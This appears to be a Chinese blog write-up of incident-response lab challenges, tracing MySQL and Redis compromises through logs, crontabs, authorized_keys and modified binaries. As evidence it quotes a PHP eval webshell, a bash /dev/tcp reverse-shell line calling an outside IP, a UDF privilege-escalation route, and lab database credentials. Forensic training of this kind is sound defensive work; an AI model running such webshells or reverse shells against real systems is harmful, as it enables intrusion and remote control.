第二章 日志分析
|
30
|
0
|
应急响应

1536 字
|
7 分钟

日志分析-apache日志分析

忘记了。。。

日志分析-mysql应急响应

  • 1.黑客第一次写入的shell flag{关键字符串}
  • 2.黑客反弹shell的ip flag{ip}
  • 3.黑客提权文件的完整路径 md5 flag{md5} 注 /xxx/xxx/xxx/xxx/xxx.xx
  • 4.黑客获取的权限 flag{whoami后的值}

进/var/www/html,导入D盾

Python
1	2	<?php @eval($_POST['a']);?>	4
//ccfda79e-7aa1-4275-bc26-a6189eb9a20b

flag{ccfda79e-7aa1-4275-bc26-a6189eb9a20b}

反弹shell:去查看mysql的日志,发现

查看/tmp/1.sh

Python
bash -i >&/dev/tcp/192.168.100.13/777 0>&1

flag{192.168.100.13}

盲猜UDF提权,参考:UDF提权-CSDN博客

要利用udf提权,首先要

获取了MySQL控制权:获取到账号密码,并且可以远程连接

获取到的账户具有写入权限,即secure_file_priv值为空

查看web目录,发现mysql账号密码

Python
<?php
$conn=mysqli_connect("localhost","root","334cc35b3c704593","cms","3306");
if(!$conn){
echo "数据库连接失败";
}

mysql -uroot -p334cc35b3c704593

登录MySQL之后,查看secure_file_priv值

确实为空,查看plugin_dir

进入该目录,发现udf.so

flag{b1818bde4e310f3d23f1005185b973e7}

写入了自定义函数,查看具体函数

执行select sys_eval(“whoami”);

flag{mysql}

日志分析-redis应急响应

  • 1、通过本地 PC SSH到服务器并且分析黑客攻击成功的 IP 为多少,将黑客 IP 作为 FLAG 提交;
  • 2、通过本地 PC SSH到服务器并且分析黑客第一次上传的恶意文件,将黑客上传的恶意文件里面的 FLAG 提交;
  • 3、通过本地 PC SSH到服务器并且分析黑客反弹 shell 的IP 为多少,将反弹 shell 的IP 作为 FLAG 提交;
  • 4、通过本地 PC SSH到服务器并且溯源分析黑客的用户名,并且找到黑客使用的工具里的关键字符串(flag{黑客的用户-关键字符串} 注关键字符串 xxx-xxx-xxx)。将用户名和关键字符串作为 FLAG提交
  • 5、通过本地 PC SSH到服务器并且分析黑客篡改的命令,将黑客篡改的命令里面的关键字符串作为 FLAG 提交;
radis的常见利用手法:
  1. 未授权访问
    缺乏身份验证:Redis 默认不要求身份验证,攻击者可以直接连接到 Redis 实例并执行任意命令。

开放的网络接口:如果 Redis 监听在公共 IP 地址上,攻击者可以通过网络远程访问 Redis 实例。

  1. 远程代码执行
    CONFIG 命令:攻击者可以利用未授权访问,通过 CONFIG 命令修改配置,例如设置 dir 和 dbfilename 来写入恶意文件,从而在目标服务器上执行代码。

模块加载:Redis 允许加载自定义模块,如果没有进行适当的访问控制,攻击者可以加载恶意模块并执行任意代码。

  1. 持久化攻击
    持久化文件劫持:攻击者可以修改 Redis 的持久化配置(如 RDB 或 AOF 文件),然后写入恶意数据,当 Redis 重启时执行恶意操作。

恶意数据注入:通过注入恶意数据到持久化文件中,攻击者可以在数据恢复时触发恶意行为。

  1. 拒绝服务攻击(DoS)
    资源耗尽:通过发送大量请求或者存储大量数据,攻击者可以耗尽 Redis 服务器的内存或 CPU 资源,导致服务不可用。

大键值操作:操作超大键值(如大列表或集合)可能会导致 Redis 性能下降,甚至崩溃。

  1. 数据篡改和泄露
    数据窃取:未经授权的访问可以导致敏感数据的泄露。

数据篡改:攻击者可以修改或删除关键数据,影响系统的正常运行。

查看日志:

发现192.168.100.20有恶意行为。

第一题的flag是flag{192.168.100.20}

第二题,黑客上传的恶意文件,应该就是这个exp.so了

下载下来分析,看到flag:

或者直接用strings命令也可以:flag{XJ_78f012d7-42fc-49a8-8a8c-e74c87ea109b}

反弹 shell 通常通过以下方式实现:

  • 定时任务(cron job):黑客可能会在目标机器上设置定时任务,定期执行反弹 shell 的命令。
  • 启动脚本:黑客可能会修改系统的启动脚本(如 /etc/rc.local),在系统启动时执行反弹 shell。
  • 恶意文件:黑客可能会在目标机器上放置恶意脚本或程序,用于执行反弹 shell。

查看定时任务可以用crontab -l 命令

果然看到了反弹shell的定时任务:

下一题是找黑客的用户名,正常来说如果没有其他活动是不会暴露用户名的,除非对面把自己的ssh公钥写进了服务器,看一下authorized_keys文件:

果然发现了用户名:xj-test-user

题目还要求找到黑客使用的工具里的关键字符串,

百度搜索这个用户名,发现了github账号,里面有黑客用到的工具,这样看来黑客打的应该就是redis主从漏洞了:

在commit里面发现了关键字符串:wow-you-find-flag

所以最终的flag就是flag{xj-test-user-wow-you-find-flag}

最后一关是分析黑客篡改的命令

查找一下最新修改的10个命令:

ls -lt –time=ctime /usr/bin | head -n 10

找到flag:flag{c195i2923381905517d818e313792d196}

参考文章:https://blog.csdn.net/ywx05_/article/details/145992857

应急响应
暂无评论

发送评论 编辑评论 


				

			

						

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
						

					

				

				

					

						

							

								
							

							
							
													

					

				

			

			
			

				

					
				

			

				

											

							
							
						

																				
					
											
						

	

		
|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	

	

		
颜文字
Emoji
小恐龙
花!
	


									

			

			
			
		

	






上一篇